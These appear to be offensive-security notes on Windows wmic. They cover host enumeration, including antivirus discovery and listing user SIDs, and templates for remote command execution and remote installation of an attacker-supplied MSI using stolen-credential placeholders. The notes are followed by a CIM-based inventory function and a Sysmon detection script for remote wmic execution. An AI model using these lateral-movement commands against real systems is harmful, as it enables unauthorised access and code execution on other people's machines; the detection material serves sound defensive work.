The wmic command on Windows is extremely useful, but it is also deprecated (because of its usefulness to attackers!). It is available on Windows 10 21H1 and earlier. On later systems the PowerShell cmdlets must be used instead (which increases the risk that the activity will be logged).

  • wmic product get name,version,vendor — list all installed software (but misses 32-bit applications installed on a 64-bit OS)
  • wmic service get name,displayname,pathname,startmode — list all services
  • wmic qfe get caption,description,hotfixid,installedon — list installed updates
  • wmic service list brief — another way of listing services
  • wmic service where "name like '$SERVICE_NAME'" get name,pathname — get information about a particular service
  • wmic /namespace:\\root\securitycenter2 path antivirusproduct — enumerate antivirus (the namespace needs the double backslash; with no verb wmic defaults to get and prints every property)
  • wmic useraccount get name,sid — Display SIDs for all (local) users
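Since wmic is gone on newer builds, the same inventory has to come from the CIM cmdlets. The function below is an added example, not part of the original notes: it maps each wmic line above to its Get-CimInstance equivalent and returns the results as one ordered table. The $ServiceName parameter and its 'Spooler' default are placeholders for the service you actually want to inspect.

```powershell
# Added example (not from the original notes): the wmic enumeration above, rewritten
# with the CIM cmdlets that remain available once wmic has been removed.
function Get-HostInventory {
    param([string]$ServiceName = 'Spooler')   # placeholder service name for the filtered query

    [ordered]@{
        # wmic product get name,version,vendor
        # Caveat: Win32_Product only lists MSI-registered products, and every query makes
        # Windows Installer re-verify each package, which is slow and writes MsiInstaller
        # reconfiguration events (Event ID 1035) to the Application log.
        Software  = Get-CimInstance -ClassName Win32_Product |
                        Select-Object Name, Version, Vendor

        # wmic service get name,displayname,pathname,startmode
        Services  = Get-CimInstance -ClassName Win32_Service |
                        Select-Object Name, DisplayName, PathName, StartMode

        # wmic qfe get caption,description,hotfixid,installedon
        Hotfixes  = Get-CimInstance -ClassName Win32_QuickFixEngineering |
                        Select-Object Caption, Description, HotFixID, InstalledOn

        # wmic service where "name like '$SERVICE_NAME'" get name,pathname
        # WQL LIKE uses % as its wildcard, e.g. 'Spool%'
        Service   = Get-CimInstance -ClassName Win32_Service -Filter "Name LIKE '$ServiceName'" |
                        Select-Object Name, PathName

        # wmic /namespace:\\root\securitycenter2 path antivirusproduct
        # root/SecurityCenter2 exists on client SKUs only; SilentlyContinue keeps the
        # inventory running on servers where the namespace is absent.
        Antivirus = Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
                        Select-Object displayName, productState, pathToSignedProductExe

        # wmic useraccount get name,sid
        # Filtered to local accounts: without the filter the class walks the whole domain.
        Users     = Get-CimInstance -ClassName Win32_UserAccount -Filter 'LocalAccount = TRUE' |
                        Select-Object Name, SID
    }
}

$inventory = Get-HostInventory -ServiceName 'Spool%'
$inventory.Services | Format-Table -AutoSize
$inventory.Antivirus | Format-Table -AutoSize
```

Each value in the returned hashtable is a normal object collection, so it can be piped to Export-Csv or compared against a baseline, which is the main advantage over parsing wmic's text output.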

Remote process creation

How to run a remote command with wmic

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    process call create "$SOME_COMMAND"

Install an MSI package

How to remotely install a Windows package with wmic

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    product call install PackageLocation=$PATH_TO_ATTACKER_MSI
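Both remote techniques above (process call create and product call install) leave the same two footprints: on the operator's host, wmic.exe is launched with a /node: argument, and on the target the resulting process (or msiexec.exe for an MSI install) is spawned by the WMI provider host, WmiPrvSE.exe. The script below is an added example and not part of the original notes: it flags process-creation records matching either pattern. It assumes Sysmon ProcessCreate logging (Event ID 1) for the live query, the record fields Image, ParentImage, CommandLine and Computer are taken from Sysmon's event data, and the sample records at the bottom are constructed rather than real telemetry.

```powershell
# Added example (not from the original notes): detection logic for the remote wmic
# usage documented above, written for Sysmon Event ID 1 but usable on any records
# that carry Image, ParentImage, CommandLine and Computer.

# Convert a Sysmon ProcessCreate event into a flat record of the fields we need.
function ConvertFrom-SysmonProcessCreate {
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Computer    = $x.Event.System.Computer
            Image       = $d['Image']
            ParentImage = $d['ParentImage']
            CommandLine = $d['CommandLine']
            User        = $d['User']
        }
    }
}

# Flag records that look like one side of a remote wmic execution.
function Find-RemoteWmiExecution {
    param([Parameter(ValueFromPipeline)] $Record)
    process {
        $reasons = @()
        # Target side: anything spawned by the WMI provider host. Interactive sessions
        # rarely do this, so the parent alone is a strong signal.
        if ($Record.ParentImage -match '\\WmiPrvSE\.exe$') {
            $reasons += 'parent is WmiPrvSE.exe'
        }
        # Source side: wmic.exe pointed at another host with the verbs from these notes.
        if ($Record.Image -match '\\wmic\.exe$' -and $Record.CommandLine -match '/node:') {
            if ($Record.CommandLine -match 'process\s+call\s+create')  { $reasons += 'wmic remote process create' }
            if ($Record.CommandLine -match 'product\s+call\s+install') { $reasons += 'wmic remote MSI install' }
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Computer    = $Record.Computer
                Image       = $Record.Image
                CommandLine = $Record.CommandLine
                Reason      = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample records (not real telemetry) so the filter can be tried offline.
$sample = @(
    [pscustomobject]@{ Computer = 'WS01'; Image = 'C:\Windows\System32\wbem\WMIC.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'wmic.exe /node:SRV02 process call create "hostname"' },
    [pscustomobject]@{ Computer = 'SRV02'; Image = 'C:\Windows\System32\hostname.exe'
                       ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
                       CommandLine = 'hostname' },
    [pscustomobject]@{ Computer = 'SRV02'; Image = 'C:\Windows\System32\msiexec.exe'
                       ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
                       CommandLine = 'msiexec.exe /i "C:\Windows\Temp\placeholder.msi" /qn' },
    [pscustomobject]@{ Computer = 'WS01'; Image = 'C:\Windows\System32\svchost.exe'
                       ParentImage = 'C:\Windows\System32\services.exe'
                       CommandLine = 'svchost.exe -k netsvcs' }
)
# Expected: the first three records are flagged, the svchost record is not.
$sample | Find-RemoteWmiExecution | Format-Table -AutoSize

# Against live Sysmon telemetry on a host:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ConvertFrom-SysmonProcessCreate | Find-RemoteWmiExecution
```

Without Sysmon, Security Event ID 4688 provides the same Image and CommandLine fields once command-line auditing is enabled, but it records only the parent's process id, so the WmiPrvSE.exe parent check has to be resolved through the parent's own 4688 event. On the target, the remote logon that precedes the WMI call also appears as a type 3 network logon (Event ID 4624) for the account used with /user:.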